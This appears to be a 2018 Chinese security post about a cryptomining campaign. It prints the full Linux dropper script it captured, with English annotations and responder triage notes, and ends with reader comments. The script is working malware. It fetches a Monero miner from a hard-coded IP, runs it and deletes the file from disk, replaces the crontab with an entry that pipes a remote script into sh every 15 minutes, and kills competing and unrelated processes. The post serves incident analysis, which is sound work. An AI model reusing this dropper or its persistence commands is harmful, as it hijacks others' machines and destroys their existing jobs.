恶意网站
扫描挖矿的两个服务器IP
周鸿祎 2018-01-05 17:33:48 1187人浏览

下面是下载到的脚本内容:

# Captured dropper sample, annotated for analysis; the commands are unchanged.
# Appends the standard binary directories to PATH so the tools used below
# resolve; presumably needed because the script is re-run from cron (see the
# crontab entry written inside DoMine), where PATH is often minimal.
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
# Whole days since the Unix epoch (seconds / 60 / 60 / 24). The value is used
# once further down, as a grep pattern in the process-kill list.
days=$(($(date +%s) / 60 / 60 / 24))
# DoMine: download, launch and persist the miner binary.
#
# Behaviour visible in this function:
#   1. Removes /tmp/Silence* and lists processes matching "Silence" (the ps
#      output is not suppressed, so it is printed).
#   2. If no such process is listed: fetches the binary over plain HTTP with
#      wget or curl (whichever is executable under /usr/bin), marks it
#      executable, starts it detached with output discarded, then deletes the
#      file from disk 10 seconds later.
#   3. Replaces the invoking user's crontab with a single entry that fetches
#      lin.txt every 15 minutes and pipes it to sh.
#   If neither wget nor curl is found, `exit 0` ends the whole script, not
#   just this function.
#
# Triage notes for responders:
#   - The binary is deleted while the process keeps running, so there may be
#     no file left in /tmp; on Linux the process's /proc/<pid>/exe link will
#     show the path with a "(deleted)" suffix.
#   - `crontab -r` discards whatever jobs the user had before; restore them
#     from backup during clean-up, and treat a crontab whose only entry pipes
#     an HTTP download into sh as the persistence indicator.
#   - /tmp/.cron exists only for a few seconds and is removed afterwards.
#   - Network side: an HTTP GET to the hard-coded host and an outbound
#     stratum+tcp session to the pool on port 80.
DoMine()
{
rm -rf /tmp/Silence*
# $? below is the status of the last grep: non-zero means no matching process.
ps -ef|grep Silence |grep -v grep
 if [ $? -ne 0 ]; then
    if [ -x /usr/bin/wget ] ; then
        wget -q http://45.123.190.178/Silence -O /tmp/Silence
    elif [ -x /usr/bin/curl ] ; then
        curl -o /tmp/Silence http://45.123.190.178/Silence
    else
            exit 0;
    fi
    chmod +x /tmp/Silence
    # NOTE(review): the option letters look like the cpuminer-style convention
    # (-a algorithm, -o pool URL, -u account/wallet, -p password); -B and -R
    # are presumably background mode and retry pause. Not confirmed from this
    # page, since the binary itself is not shown.
    nohup /tmp/Silence -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:80 -u 44pgg5mYVH6Gnc7gKfWGPR2CxfQLhwdrCPJGzLonwrSt5CKSeEy6izyjEnRn114HTU7AWFTp1SMZ6eqQfvrdeGWzUdrADDu -p x -R 1 &>>/dev/null &
    sleep 10
    # On-disk copy removed while the process is still running.
    rm -rf /tmp/Silence

    # Persistence: the cron line matches whichever downloader is installed.
    if [ -x /usr/bin/wget ] ; then
        echo '*/15 * * * * wget -q http://45.123.190.178/lin.txt -O - |sh' > /tmp/.cron
    elif [ -x /usr/bin/curl ] ; then
        echo '*/15 * * * * curl http://45.123.190.178/lin.txt |sh' > /tmp/.cron
    else
            exit 0;
    fi
    # Existing crontab is wiped before the single-entry file is installed.
    crontab -r
    crontab /tmp/.cron
    sleep 3
    rm /tmp/.cron
fi
}

# Process-kill list, run on every execution before the miner is (re)started.
# Each line sends SIGKILL to every process whose `ps auxf` line (or, for
# `pkill -f`, whose full command line) contains the given string: long
# base58-looking strings (presumably wallet addresses of other miners), pool
# hostnames, and generic mining keywords.
#
# Triage notes for responders:
#   - Matching is by plain substring, so unrelated processes are killed too:
#     anything with "xmr", "yam", "miner", "monero", "stratum" or "curl" in
#     its command line. Unexplained SIGKILLs of such processes at 15-minute
#     intervals are a useful host-side signal.
#   - Several patterns ("cryptonight", "stratum", "xmr.crypto-pool.fr",
#     "crypto-pool", "xmr") also match the command line that DoMine itself
#     launches, so a miner started by an earlier run is killed here as well.
ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9
# Pattern is the epoch-day number computed at the top of the script, unquoted;
# it matches any ps line containing that digit sequence anywhere (PID, time
# columns or arguments), not only a specific program.
ps auxf|grep -v grep|grep ${days}|awk '{print $2}'|xargs kill -9
# NOTE(review): "logind.conf" and "kworker" are presumably names that other
# miners use as disguise; "kworker" also matches the kernel worker threads
# that ps lists. Not explained on the page.
ps auxf|grep -v grep|grep "logind.conf"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "kworker"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "45hsTaSqTQM4K1Xeqkcy7eLzqdEuQ594fJVmQryCemQSCU878JGQdSDCxbhNyVjSkiaYat8yAfBuRTPSEUPZoARm9a5XEHZ"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr"|awk '{print $2}'|xargs kill -9
# pkill -f matches against the full command line of every process.
pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4
pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB
pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df
pkill -f cpuloadtest
pkill -f crypto-pool
pkill -f xmr
pkill -f prohash
pkill -f monero
pkill -f miner
pkill -f nanopool
pkill -f minergate
pkill -f yam
pkill -f yam2
pkill -f minerd
pkill -f Circle_MI.png
# Terminates every process with "curl" in its command line, legitimate or not.
pkill -f curl
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9
# Trigger: DoMine runs only when no ps line contains "11231".
# NOTE(review): what "11231" identifies is not shown on the page; presumably a
# marker for an instance the author considers already running. Confirm against
# the binary or a later version of lin.txt before relying on it.
ps auxf|grep -v grep|grep "11231" || DoMine

评论 18
匿名用户 2018-05-22 16:03:42 回复
还有这种操作?
匿名用户 2018-05-21 16:17:48 回复
不错
匿名用户 2018-05-21 16:11:45 回复
姿势可以
匿名用户 2018-05-21 16:10:22 回复
姿势可以
匿名用户 2018-05-21 16:07:40 回复
学习学习1
h0st 2018-05-21 16:07:08 回复
新姿势学习下。。。
匿名用户 2018-05-21 16:06:19 回复
学习学习
匿名用户 2018-05-21 16:04:32 回复
厉害了
匿名用户 2018-05-21 15:56:54 回复
学习个
匿名用户 2018-05-21 15:50:03 回复
niupi 1
匿名用户 2018-05-21 15:49:06 回复
niupi
匿名用户 2018-05-21 15:47:50 回复
77777
匿名用户 2018-05-21 15:46:45 回复
666
匿名用户 2018-05-21 15:45:27 回复
666
匿名用户 2018-05-21 15:44:21 回复
666
291824029 2018-01-22 11:28:32 回复
。。
路人甲 2018-01-08 13:31:31 回复
不错啊!
fifysky 2018-01-08 09:14:18 回复
教主还在一线工作?